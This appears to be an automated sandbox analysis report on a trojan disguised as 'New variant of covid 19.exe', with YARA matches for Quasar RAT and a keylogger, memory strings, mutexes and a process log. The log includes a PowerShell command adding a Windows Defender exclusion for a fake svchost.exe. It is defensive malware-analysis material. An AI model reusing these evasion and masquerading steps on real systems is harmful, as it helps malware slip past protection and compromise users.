      Source: svchost.exe, 0000001B.00000002.311156508.0000022377242000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
      Source: svchost.exe, 0000001B.00000002.311156508.0000022377242000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
      Source: svchost.exe, 0000001B.00000003.309958248.0000022377260000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
      Source: svchost.exe, 0000001B.00000002.311281205.000002237725C000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
      Source: svchost.exe, 0000001B.00000003.310012576.0000022377249000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
      Source: svchost.exe, 0000001B.00000002.311281205.000002237725C000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
      Source: svchost.exe, 0000001B.00000002.311281205.000002237725C000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
      Source: svchost.exe, 0000001B.00000003.310012576.0000022377249000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t
      Source: svchost.exe, 0000001B.00000003.309958248.0000022377260000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
      Source: svchost.exe, 0000001B.00000002.311128902.000002237723D000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
      Source: svchost.exe, 0000001B.00000003.287773862.0000022377231000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
      Source: svchost.exe, 00000011.00000003.281475012.000000000393A000.00000004.00000001.sdmpString found in binary or memory: https://felix.data.tm-awx.com
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://felix.data.tm-awx.com/ampconfig.json&quot;
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://felix.data.tm-awx.com/felix.min.js
      Source: New variant of covid 19.exe, 00000000.00000003.207848034.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.281475012.000000000393A000.00000004.00000001.sdmpString found in binary or memory: https://github.com/ded/script.js
      Source: svchost.exe, 00000011.00000003.281475012.000000000393A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com
      Source: svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article17156435.ece/ALTERNATES/s615/1_GettyImages-1183794835.
      Source: svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article17166876.ece/ALTERNATES/s615/0_GettyImages-1175998874.
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-02-
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s220b/0_WhatsApp-Image-2021-02
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s270b/0_WhatsApp-Image-2021-02
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-02-
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s180/0_Salah-Pressing.jpg
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s220b/0_Salah-Pressing.jpg
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s270b/0_Salah-Pressing.jpg
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s615/0_Salah-Pressing.jpg
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s180/0_Curtis-10.png
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s220b/0_Curtis-10.png
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s270b/0_Curtis-10.png
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s615/0_Curtis-10.png
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s180/0_Salah-Goal-vs-Leeds.jpg
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s220b/0_Salah-Goal-vs-Leeds.jp
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s270b/0_Salah-Goal-vs-Leeds.jp
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s615/0_Salah-Goal-vs-Leeds.jpg
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s180/0_RobertsonCross1.jpg
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s220b/0_RobertsonCross1.jpg
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s270b/0_RobertsonCross1.jpg
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s615/0_RobertsonCross1.jpg
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s180/0_GettyImages-1231353837.
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s220b/0_GettyImages-1231353837
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s270b/0_GettyImages-1231353837
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s615/0_GettyImages-1231353837.
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s180/0_GettyImages-1304940818.
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s458/0_GettyImages-1304940818.
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s615/0_GettyImages-1304940818.
      Source: New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s180/1_FreeAgentPlayers.jpg

      E-Banking Fraud:

      Yara detected Quasar RAT
      Source: Yara match; File source: 0000000A.00000002.737784433.0000000000402000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match; File source: Process Memory Space: New variant of covid 19.exe PID: 7152, type: MEMORY
      Source: Yara match; File source: 10.2.New variant of covid 19.exe.400000.0.unpack, type: UNPACKEDPE

      System Summary:

      barindex
      Malicious sample detected (through community Yara rule)Show sources
      Source: 0000000A.00000002.737784433.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects Quasar RAT Author: Florian Roth
      Source: 10.2.New variant of covid 19.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Vermin Keylogger Author: Florian Roth
      Source: 10.2.New variant of covid 19.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Patchwork malware Author: Florian Roth
      Source: 10.2.New variant of covid 19.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Quasar RAT Author: Florian Roth
      Source: 10.2.New variant of covid 19.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Quasar RAT Author: Florian Roth
      Source: 10.2.New variant of covid 19.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects QuasarRAT malware Author: Florian Roth
      Source: 10.2.New variant of covid 19.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
      Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
      Source: C:\Users\user\Desktop\New variant of covid 19.exeCode function: 10_2_02E1F090
      Source: C:\Users\user\Desktop\New variant of covid 19.exeCode function: 10_2_02E1F960
      Source: C:\Users\user\Desktop\New variant of covid 19.exeCode function: 10_2_02E1ED48
      Source: C:\Users\user\Desktop\New variant of covid 19.exeCode function: 10_2_06ADD600
      Source: C:\Users\user\Desktop\New variant of covid 19.exeCode function: 10_2_06AD7350
      Source: C:\Users\user\Desktop\New variant of covid 19.exeCode function: 10_2_06AD3EBC
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeCode function: 39_2_00373F1E
      Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6372 -s 1956
      Source: New variant of covid 19.exeStatic PE information: invalid certificate
      Source: New variant of covid 19.exe, 00000000.00000000.194712766.0000000000F22000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameYNcegbh OAaEntXrDdbrC.exeL vs New variant of covid 19.exe
      Source: New variant of covid 19.exeBinary or memory string: OriginalFilename vs New variant of covid 19.exe
      Source: New variant of covid 19.exe, 0000000A.00000002.739768531.00000000010F8000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs New variant of covid 19.exe
      Source: New variant of covid 19.exe, 0000000A.00000002.739097060.000000000045A000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameXCzM BeF.exe2 vs New variant of covid 19.exe
      Source: New variant of covid 19.exe, 0000000A.00000002.739179364.0000000000CD2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameYNcegbh OAaEntXrDdbrC.exeL vs New variant of covid 19.exe
      Source: New variant of covid 19.exe, 0000000A.00000002.752537813.0000000006450000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameKernelbase.dll.muij% vs New variant of covid 19.exe
      Source: C:\Windows\System32\svchost.exeSection loaded: xboxlivetitleid.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: cdpsgshims.dll
      Source: 0000000A.00000002.737784433.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.New variant of covid 19.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.New variant of covid 19.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.New variant of covid 19.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.New variant of covid 19.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
      Source: 10.2.New variant of covid 19.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
      Source: 10.2.New variant of covid 19.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: classification engineClassification label: mal100.troj.evad.winEXE@48/29@47/5
      Source: C:\Users\user\Desktop\New variant of covid 19.exeFile created: C:\Users\user\AppData\Local\DdUPmLN_kgoHVaSIjqNjSlvYSJump to behavior
      Source: C:\Users\user\Desktop\New variant of covid 19.exeMutant created: \Sessions\1\BaseNamedObjects\QSR_MUTEX_0rTOWP1Cp29BLnKtOI
      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6372
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5408:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4616:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6872:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6960:120:WilError_01
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ti3ey4z3.avd.ps1Jump to behavior
      Source: unknownProcess created: C:\Windows\explorer.exe
      Source: unknownProcess created: C:\Windows\explorer.exe
      Source: unknownProcess created: C:\Windows\explorer.exe
      Source: unknownProcess created: C:\Windows\explorer.exe
      Source: New variant of covid 19.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\New variant of covid 19.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Users\user\Desktop\New variant of covid 19.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Users\user\Desktop\New variant of covid 19.exe | File read: C:\Users\user\Desktop\desktop.ini
      Source: C:\Users\user\Desktop\New variant of covid 19.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: C:\Users\user\Desktop\New variant of covid 19.exe | File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Windows\SysWOW64\WerFault.exe | File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Users\user\Desktop\New variant of covid 19.exe | File read: C:\Users\user\Desktop\New variant of covid 19.exe:Zone.Identifier
      Source: unknown | Process created: C:\Users\user\Desktop\New variant of covid 19.exe 'C:\Users\user\Desktop\New variant of covid 19.exe'
      Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
      Source: unknown | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe' -Force
      Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
      Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknown | Process created: C:\Windows\SysWOW64\timeout.exe timeout 1
      Source: unknown | Process created: C:\Users\user\Desktop\New variant of covid 19.exe C:\Users\user\Desktop\New variant of covid 19.exe
      Source: unknown | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6372 -s 1956
      Source: unknown | Process created: C:\Windows\explorer.exe 'C:\Windows\explorer.exe' 'C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe'
      Source: unknown | Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
      Source: unknown | Process created: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe 'C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe'
      Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
      Source: unknown | Process created: C:\Windows\explorer.exe 'C:\Windows\explorer.exe' 'C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe'
      Source: unknown | Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
      Source: unknown | Process created: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe 'C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe'
      Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
      Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
      Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
      Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
      Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
      Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
      Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
      Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
      Source: unknown | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe' -Force
      Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
      Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknown | Process created: C:\Windows\SysWOW64\timeout.exe timeout 1
